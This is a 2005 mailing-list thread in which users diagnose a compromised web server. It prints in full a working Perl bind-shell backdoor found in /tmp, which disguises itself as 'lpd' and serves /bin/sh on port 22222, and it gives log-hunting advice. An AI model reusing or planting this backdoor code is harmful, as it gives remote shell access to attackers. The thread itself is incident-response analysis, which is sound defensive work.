Barbara M. skrev:
> On Tue, 15 Nov 2005, Vidar Tyldum Hansen wrote:
>
>>> A friends that have an httpd server based on TSL 2.2 have received this
>>> mail:
>>>
>>> -------------------------------------------
>>> Subject: Your_host_have_been_attacked
>>>
>>> Your host have been attacked by pv script. Look on netstat -anp for
>>> process listen on 4123 port
>>>
>>> -------------------------------------------
>>>
>>>
>>> It tell me that there is a process listing on port 4123 and another on
>>> 22222. Stopping httpd and killing the process that own the daemons seems
>>> temporarily "solve" the problem.
>>> He did that process are owned by httpd.
>>> It is now busy in rebuilding a new box where to migrate data, so request
>>> me to collect info on the "pv script".
>>> Any hints?
>> Name of process? Where does it live on the filesystem?
>
> I haven't see the server; It tell me that the process is named "perl"
> And find a perl script in /tmp
>
>> What does a 'strings filename' reveal?
>
> Can explain this?
If it was a binary file and not a script you could have gotten some
valuable info using the program strings.
Try 'strings <filename>' on a binary file. Some phrases could lead you
further or at least give you something to google by.
>> Go through the access-logs for apache. My guess is that there was a
>> badly written PHP app on it and that led to remote execution
>> vulnerabilities.
>
> Suggested;
> Replay: "Yes, but parsing some GB of log without an idea on what exactly
> search ..."
Usually there is an exceptionally long logline or you find the name of
the running process in a GET string. I would grep for "pv2" and/or "/tmp".
>> The fact that all the parasites ran as httpd and not root points very
>> hard in that direction.
>
> This is what my friends have found in /tmp :
>
>
> ---------pv2------------------------
> #!/usr/bin/perl
> use Socket;
> $port=22222;
> $proto=getprotobyname('tcp');
> $cmd="lpd";
> $system='/bin/sh';
> $0=$cmd;
> socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
> setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die
> "setsockopt: $!";
> bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
> listen(SERVER, SOMAXCONN) or die "listen: $!";
> for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
> open(STDIN, ">&CLIENT");
> open(STDOUT, ">&CLIENT");
> open(STDERR, ">&CLIENT");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
> }
>
> ------------------------------------
>
> If anyone can translate for poeple that not "speak" enough perl to
> fully understand ... ;-)
It basicly leaves /bin/sh listening for commands via port 22222. AKA the
world logged in as 'httpd'. Used either to install further services or
trying to elevate priveledges to root.
_______________________________________________
tsl-discuss mailing list
[email protected]
http://lists.trustix.org/mailman/listinfo/tsl-discuss
